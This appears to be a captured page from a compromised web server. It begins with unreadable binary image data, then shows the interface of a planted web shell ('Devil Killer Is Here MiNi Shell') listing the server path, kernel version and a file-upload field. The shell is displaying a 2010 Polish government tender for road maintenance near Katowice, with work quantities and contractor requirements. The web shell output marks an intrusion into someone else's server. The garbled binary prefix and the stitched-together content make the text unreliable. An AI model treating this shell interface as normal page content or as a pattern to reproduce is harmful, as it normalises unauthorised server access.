JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100908/283332-N-2010.html

<p class="kh_header"><b>Katowice: Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach - Rejon Wysoki Brzeg</b><br>
<b>Numer ogłoszenia: 283332 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Katowicach , ul. Myśliwska 5, 40-016 Katowice, woj. śląskie, tel. 032 2586281, faks 032 2598710.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach - Rejon Wysoki Brzeg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje typowe roboty interwencyjno utrzymaniowe zlecane w dwóch podstawowych trybach z uwagi na specyfikę prac utrzymaniowych oraz obowiązki Ustawowe nałożone na Zamawiającego jako administratora dróg krajowych.
Opis wielkości robót w formie: opis robót - grupa robót/SST/j.m./ilość.
1.Grupa robót nr 1 : UTRZYMANIE NAWIERZCHNI           
 RAZEM : Grupa robót nr 1 : UTRZYMANIE NAWIERZCHNI
Lp. Opis robót      
1 Remont nawierzchni mieszankami mineralno-asfaltowymi na gorąco D-05.03.17        
 a) remont cząstkowy masą z Wytwórni Mas Bitumicznych D-05.03.17        
     - przy grubości do 4cm  m2 36 000      
     - dodatek za każdy dalszy 1cm pow. 4cm  m2 36 000      
 b) remont cząstkowy masą z recyklera D-05.03.11a        
     - przy grubości do 4cm  m2 12 000      
     - dodatek za każdy dalszy 1cm pow. 4cm  m2 12 000      
2 Remont nawierzchni mieszankami mineralno-asfaltowymi na zimno D-05.03.17        
     - remont cząstkowy przy grubości do 4cm  m2 8000      
     - dodatek za każdy dalszy 1cm pow. 4cm  m2 8000      
3 Remont nawierzchni emulsjami asfaltowymi i grysami D-05.03.17        
  - remont cząstkowy przy głębokości wyboi do 1,5cm  m2 80000      
  - dodatek za każde dalsze 0,5cm głębokości wyboju  m2 80000      
4 Likwidacja spękań poprzecznych D-05.03.15 mb 24 000      
5 Frezowanie powierzchniowe nawierzchni dla wyrównania sfałdowań D-05.03.11c        
  - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km  m2 15 000      
  - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km  m2 15 000      
  - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu  m2 15 000      
6 Nawierzchnie z betonu asfaltowego D-05.03.05        
 ( nakładki z mas bitumicznych BA ) zamiennie D-05.03.05a        
  - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km D-05.03.11c m2 10 000      
  - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km  m2 10 000      
  - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu  m2 10 000      
  - skropienie nawierzchni asfaltem  m2 10 000      
  - warstwa ścieralna o gr.3cm D-05.03.05 zamiennie D-05.03.05a
D-05.03.24 D-04.03.01 m2 10 000      
  - dodatek do warstwy ścieralnej za każdy 1cm powyżej 3 cm gr.  m2 10 000      
  - warstwa wiążąca o gr. 4cm D-05.03.05 zamiennie D-05.03.05a,
D-04.03.01 m2 10 000      
  - dodatek za każdy do warstwy wiążącej za każdy 1cm powyżej 4 cm gr.  m2 10 000      
7 Nakładki bitumiczne z SMA oraz z mieszanek o nieciągłym uziarnieniu D-05.03.13 zamiennie D-05.03.13a D-05.03.24 D-04.03.01        
  - przy grubości frezowania do 4cm wraz z wywozem na odl. do 10km D-05.03.11c m2 23 000      
  - za każdy następny 1cm frezowania powyżej 4cm wraz z wywozem na odl. do 10km  m2 23 000      
  - oczyszczanie mechaniczne nawierzchni ulepszonej z bitumu  m2 23 000      
  - skropienie nawierzchni asfaltem  m2 23 000      
 a) mastyks grysowy SMA D-05.03.13 zamiennie D-05.03.13a
D-05.03.24 D-04.03.01       
  - warstwa ścieralna o gr.3cm D-05.03.13 zamiennie D-05.03.13a,
D-05.03.24 D-04.03.01 m2 23 000      
  - dodatek do warstwy ścieralnej za każdy 1cm powyżej 3 cm gr.  m2 23 000      
  - warstwa wiążąca o gr. 4cm D-05.03.13 zamiennie D-05.03.13a, D-05.03.05a
D-04.03.01 m2 23 000      
  - dodatek za każdy do warstwy wiążącej za każdy 1cm powyżej 4 cm gr.  m2 23 000      
 b) mieszanka o nieciągłym uziarnieniu do cienkich warstw D-05.03.24        
  - warstwa ścieralna o gr. do 3cm D-04.03.01 m2 3000      
          
2.Grupa robót nr 2 : UTRZYMANIE POBOCZY          
RAZEM : Grupa robót nr 2 : UTRZYMANIE Lp. Opis         
1 Remont i uzupełnienie ubytków poboczy D-06.03.02        
  - naprawy poboczy z tłucznia - gr.do 10cm  m2 6 000      
  - naprawy poboczy destruktem - materiałem po frezowaniu mas bitumicznych 
   ( frezem ) - gr.do 10cm  m2 6 000      
2 Ścięcie zawyżonych poboczy D-06.03.02        
  - wykonywane mechanicznie - ścinanie o gr.10cm  m2 6 000      
  - wykonywane mechanicznie - za każde dalsze 5cm ponad 10cm grubości ścinania  m2 6 000      
  - wykonywane ręcznie - ścinanie o grubości 10cm  m2 6 000      
  - wykonywane ręcznie - za każde dalsze 5cm ponad 10cm grubości ścinania  m2 6 000      
3 Naprawa rozmytych skarp D-06.01.01a        
  - Wywiezienie ziemi i szlamu samochodami samowyładowczymi na średnią odległość do 10km  m3 300      
  - Wywiezienie ziemi i szlamu samochodami samowyładowczymi - dodatek za każdy następny 1km ponad 1km  m3 300      
  - Opłata za wysypisko śmieci  m3 300      
  - Przewóz samochodem samowyładowczym materiału do wbudowania w skarpę nasypu (materiał zamawiającego) transport na odl. 10km  t  300      
  - Przewóz samochodem samowyładowczym materialu do wbudowania w skarpę nasypu -za każdy rozpoczęty 1km ponad 10km  t  300      
  - Ręczne formowanie nasypów z ziemi dowożonej samochodami samowyładowczymi  m3 300      
  - Zagęszczenie nasypów ubijakami mechanicznymi,  m3 300      
  - Plantowanie, obrobienie na czysto skarp i korony nasypów   m2 300      
  - Humusowanie skarp z obsianiem warstwy humusu grubości 5cm  m2 300      
  - Humusowanie skarp z obsianiem warstwy humusu - dodatek za każde dalsze 5cm humusu (ponad 5cm)  m2 300  
3.Grupa robót nr 3 : UTRZYMANIE ODWODNIENIA DROGI          
 RAZEM : Grupa robót nr 3 : UTRZYMANIE ODWODNIENIA DROGI    
Lp. Opis         
1 Renowacja i pogłębienie istniejących rowów D-06.04.01        
  - oczyszczenie rowu z namułu wraz z profilowaniem dla średniej gł.namułu 30cm dna i skarp rowu i wywozem nieczystości na średnią odległość 10 km   mb 10000      
  - odtworzenie przebiegu rowów przydrożnych ( wykonanie ) wraz z wywozem  
   nadmiaru ziemi na odległość do 10 km  mb 5000      
  - umocnienie skarp rowów płytami ażurowymi o wymiarach 40x60cm D-06.01.01 m2 2000      
  - umocnienie skarp rowów płytami chodnikowymi o wymiarach 50x50x7cm D-06.01.01 m2 2000      
  - umocnienie dna rowu płytami chodnikowymi 50x50x7cm D-06.01.01 mb 1000      
  - umocnienie dna rowu prefabrykowanymi korytkami betonowymi  D-06.01.01 mb 1000      
2 Oczyszczenie otwartych ścieków betonowych , kamiennych i przykrawężnikowych D-03.01.03 mb 2000      
3 Wykonanie , remont i regulacja studni rewizyjnych , przykanalików i wpustów deszczowych         
 Wykonanie nowych elementów : D-03.02.01        
  - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1000 mm i gł. 3 m w nawierzchni jezdni D-03.02.01 szt 5      
  - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1200 mm i gł. 3 m w nawierzchni jezdni D-03.02.01 szt 5      
  - studnia rewizyjna o śr.prefabrykowanych kręgów betonowych 1500 mm i gł. 3 m w nawierzchni jezdni D-03.02.01 szt 5      
  - wykonanie przykanalika z PCV o średnicy : D-03.02.01        
 a) 100 mm D-03.02.01 mb 20      
 b) 150 mm D-03.02.01 mb 20      
  - studzienki deszczowe z osadnikiem bez syfonu ( kratki ściekowe drogowe ) w jezdni bitumicznej D-03.02.01 szt 20      
  - studzienki deszczowe z osadnikiem bez syfonu ( kratki ściekowe drogowe ) w poboczu drogi ( w zieleńcu ) D-03.02.01 szt 20      
 Regulacja i remont istniejących elementów : D-03.02.01a        
  - wymiana włazów kanałowych studni rewizyjnych D-03.02.01a szt 20      
  - wymiana wpustów ściekowych  D-03.02.01a szt 20      
  - regulacja włazów kanałowych D-03.02.01a szt 20      
  - regulacja kratek ściekowych D-03.02.01a szt 20      
4 Udrożnienie kanalizacji deszczowej         
 Czyszczenie kanalizacji deszczowej z rur betonowych D-03.01.03        
  - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,4 m D-03.01.03 mb 100      
  - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,6 m D-03.01.03 mb 100      
  - oczyszczenie z namułu kanalizacji deszczowej o śr. 0,8 m D-03.01.03 mb 100      
  - oczyszczenie z namułu kanalizacji deszczowej o śr. 1,0 m D-03.01.03 mb 100      
 Czyszczenie kratek ściekowych - wraz z wywozem nieczystości na odl. do 10 km i opłatą za wysypisko odpadow D-03.01.03 szt 500      
 Czyszczenie studni rewizyjnych - wraz z wywozem nieczystości na odl. do 10 km i opłatą za wysypisko odpadów D-03.01.03 szt 100      
 Czyszczenie przykanalików z kratek ściekowych D-03.01.03 szt 100      
4.Grupa robót nr 4 : Chodniki          
 RAZEM : Grupa robót nr 4 : Chodniki 
Lp. Opis         
 Ułożenie i wymiana krawężników i obrzeży chodnikowych         
1 Ułożenie i wymiana krawężników drogowych : D-08.01.01        
  - rozbiórka istniejących krawężników drogowych ( bez względu na wymiar ) wraz z wywozem na odległość 10 km D-01.02.04 mb 100      
  - prefabrykowany krawężnik drogowy 15x30x100cm  D-08.01.01 mb 100      
  - prefabrykowany krawężnik drogowy 20x30x100cm  D-08.01.01 mb 100      
2 Ułożenie i wymiana obrzeży chodnikowych D-08.03.01        
  - rozbiórka istniejących obrzeży chodnikowych ( bez względu na wymiar ) wraz z wywozem na odległość 10 km D-01.02.04 mb 100      
  - obrzeża chodnikowe na podsypce cem. - piaskowej owym.8x30x100 cm D-08.03.01 mb 100      
3 Ułożenie i wymiana nawierzchni chodnika         
  - rozbiórka istmiejącej nawierzchni chodnika i podsypki ( bez względu na   konstrukcję )   wraz z wywozem na odległość 10 km D-01.02.04 m2 300      
  - nawierzchnia chodnika z prefabrykowanej kostki betonowej o gr. 8 cm wraz z podsypką cem.-piaskową ( zał.10 % kostki kolorowej ) D-08.02.02 m2 200      
  - nawierzchnia chodnika z prefabrykowanej kostki betonowej o gr. 6 cm wraz z podsypką cem.-piaskową ( zał.20 % kostki kolorowej ) D-08.02.02 m2 200      
  - nawierzchnia chodnika z chodnikowych płytek betonowych o wym. 50x50x7cm
   wraz z podsypką cem.-piaskową D-08.02.01 m2 200      
 - nawierzchnia chodnika z chodnikowych płytek betonowych o wym. 35x35x5cm
   wraz z podsypką cem.-piaskową D-08.02.01 m2 200      
          
5.Grupa robót nr 5 : OZNAKOWANIE          
 RAZEM : Grupa robót nr 5 : OZNAKOWANIE 
Lp. Opis         
1 Ustawienie kompletnych znaków drogowych ( tarcza + słupek ) D-07.02.01        
 znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni do 0,3m2 + słupek stalowy średnicy 70mm D-07.02.01 szt 20      
 znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni ponad 0,3m2 + słupek stalowy średnicy 70mm D-07.02.01 szt 50      
2 Ustawienie kompletnych tablic drogowskazowych D-07.02.01        
  - wykonanie i ustawienie konstrukcji nośnej D-07.02.01 t 5      
  - zamocowanie tablicy drogowskazowej z folii spełniającej wymogi jak 
   dla folii II generacji D-07.02.01 m2 100      
3 Wymiana tarcz znaków pionowych ( bez słupka ) D-07.02.03 D-07.02.01        
  - znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni do 0,3m2 D-07.02.03 D-07.02.01 szt 10      
  - znaki zakazu, nakazu, ostrzegawcze i informacyjne o powierzchni ponad 0,3m2 D-07.02.03 D-07.02.01 szt 50      
4 Wymiana słupków i podpór oznakowania pionowego D-07.02.03 D-07.02.01        
  - Słupki do znaków drogowych z rur stalowych o średnicy 70mm D-07.02.03 D-07.02.01 szt 50      
  - Słupki do znaków drogowych z rur stalowych o średnicy 100mm D-07.02.03 D-07.02.01 szt 50      
  - konstrukcja nośna pod oznakowanie drogowskazowe D-07.02.03
D-07.02.01 t 10      
5 Ustawienie i wymiana pachołków drogowych  D-07.02.02        
 ( słupków prowadzących I krawędziowych )         
  - typ U-1a D-07.02.02 szt 200      
  - typ U-1b, U-2 D-07.02.02 szt 400      
6 Wymiana i montaż elementów na pachołkach D-07.02.02        
  - tabliczki z kilometrażem drogi  D-07.02.02 szt 30      
  - tabliczki z numerem drogi U-1f D-07.02.02 szt 10      
  - piktogramów kilometrowych U-7 D-07.02.02 szt 100      
  - piktogramów hektometrowych U-8 D-07.02.02 szt 100      
7 Wymiana i montaż elementów odblaskowych na poręczach D-07.02.02        
  - punktowy element odblaskowy U-1c D-07.02.02 szt 500      
  6.Grupa robót nr 6 : BEZPIECZEŃSTWO          
 RAZEM : Grupa robót nr 6 : BEZPIECZEŃSTWO 
Lp. Opis         
1 Wykonanie , kompleksowa wymiana barier stalowych         
  a) demontaż istniejących barier stalowych ( pojedyńczych ) wraz z  
     odwozem na odległość do 10km D-01.02.04 mb 1000      
  b)  demontaż istniejących barier stalowych ( podwójnych ) wraz z  
     odwozem na odległość do 10km D-01.02.04 mb 1000      
  c) ustawienie nowych barier stalowych D-07.05.01        
  - stalowe bariery ochronne o masie do 24kg na 1mb - bariery pojedyńcze D-07.05.01 mb 500      
  - stalowe bariery ochronne o masie do 28kg na 1mb - bariery podwójne D-07.05.01 mb 500      
  - stalowe bariery ochronne o masie do 39kg na 1mb - bariery pojedyńcze D-07.05.01 mb 500      
  - stalowe bariery ochronne o masie do 49kg na 1mb - bariery podwójne D-07.05.01 mb 500      
2 Wykonanie, kompleksowa wymiana barier betonowych D-07.04.01        
  a) demontaż istniejących barier ( zapór ) betonowych wraz z odwozem na odległość do 10km  D-07.04.01 mb 100      
  b) ustawienie nowych barier ( zapór ) betonowych stałych, przestwanych, np. typu NEW YERSEJ D-07.04.01 mb 100  
7.Grupa robót nr 7 : ESTETYKA DROGI          
 RAZEM : Grupa robót nr 7 : ESTETYKA DROGI         
Lp. Opis         
1 Mycie znaków pionowych ( ręczne ) I        
 Mycie drogowych znaków pionowych  I szt 1000      
 Mycie tablic drogowskazowych I m2 1000      
2 Mycie pachołków , barier i elementów odblaskowych ( ręczne ) I        
  - mycie pachołków I szt 800      
  - mycie energochłonnych barier stalowych I mb 200      
  - mycie elementów odblaskowych na barierach energochłonnych I szt 800      
3 Malowanie podpór oznakowania pionowego D-07.02.03a szt 300 
4 Pielęgnacja drzew D-09.01.02        
 Podcinanie gałęzi i konarów drzew wraz z wywozem na odległość do 10km  szt 200      
5 Wycinka krzewów , samosiejek D-01.02.01 D-09.01.02        
  - krzewy wraz z wywozem na odległość do 10km D-01.02.01 ha 10      
  - samosiejki wraz z wywozem na odległość do 10km D-09.01.02 szt 200      
6 Zbieranie śmieci z pasa drogowego wraz z wywozem na odl. do 10km i opłatą za wysypisko śmieci  II m3 1000      
7 Ręczne lub mechaniczne czyszczenie jezdni,poboczy,chodników D-05.03.00a        
  - ręczne wraz z wywozem na odległość do 10km i opłatą za wysypisko odpadów D-05.03.00a m2 30000      
  - mechaniczne wraz z wywozem na odległość do 10km i opłatą za wysypisko odpadów D-05.03.00a m2 30000      
  - opłata za wysypisko śmieci D-05.03.00a m3 480      
8 Koszenie traw  D-09.01.03        
  - koszenie traw pod znakami , barierami    energochłonnymi , ze skarp, pasa dzielącecgo, przeciwskarp i poboczy, wraz z wygrabieniem i zebraniem w stosy i wywozem na odl. do 10km D-09.01.03 m2 4 600 000 
8.Grupa robót nr 8 : Wycinanie drzew  D-01.02.01        
 RAZEM : Grupa robót nr 8 : Wycinanie drzew         
Lp. Opis         
1 Wycinka drzew         
 Ścinanie piłą mech. drzew o średnicy 10-15cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech. drzew o średnicy 16-25cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech.  drzew o średnicy 26-35cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech.  drzew o średnicy 36-45cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech. drzew o średnicy 46-55cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech. drzew o średnicy 56-65cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30      
 Ścinanie piłą mech.  drzew o średnicy 66-75cm wraz z usunięciem korzeni , zasypaniem dołu i wywozem karpiny,gałęzi i dłużycy na odległość do 10km D-01.02.01 szt 30.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie obejmuje typowe roboty interwencyjno utrzymaniowe zlecane w dwóch podstawowych trybach z uwagi na specyfikę prac utrzymaniowych oraz obowiązki Ustawowe nałożone na Zamawiającego jako administratora dróg krajowych. j.w.
nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.30.00-9, 45.11.10.00-8, 45.22.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 300 000,00 PLN 
(słownie złotych: trzysta tysięcy złotych zero groszy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 8.2.1 IDW</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej 2 zadania o profilu identycznym z przedmiotem zamówienia o wartości łącznej nie niższej niż 15,0 mln zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować lub będzie dysponował narzędziami i urządzeniami oraz środkami transportu, wymienionymi w poniższej tabeli lub przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia
Lp.	Wyszczególnienie ( parametry )	Min. Liczba jednostek
1.	Frezarka do nawierzchni drogowych o szerokości ścinania min. 1,0 m	1
2.	Rozściełacz mas bitumicznych o szer. rozkładania nawierzchni do 4,5 m	1
3.	J.w. lecz o szerokości rozkładania nawierzchni do 9,0 m	1
4.	Walce statyczne 0,9 - 9,0 Mg	5
5.	Recyklery do przetwarzania destruktu - frezu dla wykonania remontu cząstkowego nawierzchni bitumicznych	3
6.	Remonter do powierzchniowego utrwalania nawierzchni grysami	1
7.	Zamiatarki do czyszczenia mechanicznego jezdni i warstw bitumicznych	2
8.	Zwyżka montażowa do 24 metrów	1
9.	Wielozadaniowy samochód specjalistyczny typu np. UNIMOG  wraz z osprzętem (kosiarka rolkowa na wysięgniku, pogłębiarka do rowów, sekator do obcinania gałęzi)	2
10.	Samochody ciężarowe o ład. 5,0 - 25 Mg	12
11.	Koparko - ładowarki	4
12.	Młoty pneumatyczne w zestawie z kompresorem	3
13.	Agregaty prądotwórcze	3
14.	Piły spalinowe do cięcia nawierzchni drogowych	5
15.	Kafary do wbijania barier energochłonnych	2
16.	Zagęszczarki płytowe do zagęszczania podłoża	3
17.	Spalinowe ubijarki ,,stopowe do zagęszczania nawierzchni	3
18.	Piły spalinowe do cięcia drewna	4
19.	Ręczne kosiarki spalinowe do koszenia traw	8
20.	Przyczepki sygnalizacyjne dla robót drogowych wg wymagań zawartych w odrębnych przepisach	6
21.	Wytwórnia mieszanek min-bit. o wydajności min. 60t/h	1
Wykonawca zobowiązany jest do posiadania:
- Certyfikatu Zakładowej Kontroli Produkcji udokumentowania prawa do wprowadzenia wyrobu budowlanego jakim jest mieszanka mineralno-asfaltowa do wytwarzania betonu asfaltowego (AC), mieszanki SMA, asfaltu lanego (MA)
Zaplecze techniczne ( dyspozycyjność )
1.	Z uwagi na charakter zamówienia (zapewnienie bezpieczeństwa w ruchu drogowym i jego ciągłości) Wykonawca musi wykazać, że lokalizacja baz sprzętu i ludzi gwarantuje podjęcie działań związanych z określonym w SIWZ ,,trybem awaryjnym usunięcia usterek (awarii) , prac po kolizjach i wypadkach i innych zdarzeniach losowych w czasie nie dłuższym niż 1 godzina od czasu zgłoszenia przez Zamawiającego.
2.	W związku z powyższym Wykonawca winien prowadzić 24 godzinny dyżur w celu realizacji postanowień zawartych w ust. 1.
3.  Baza sprzętu winna posiadać co najmniej dwa numery telefonów stacjonarnych wraz  z faksem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
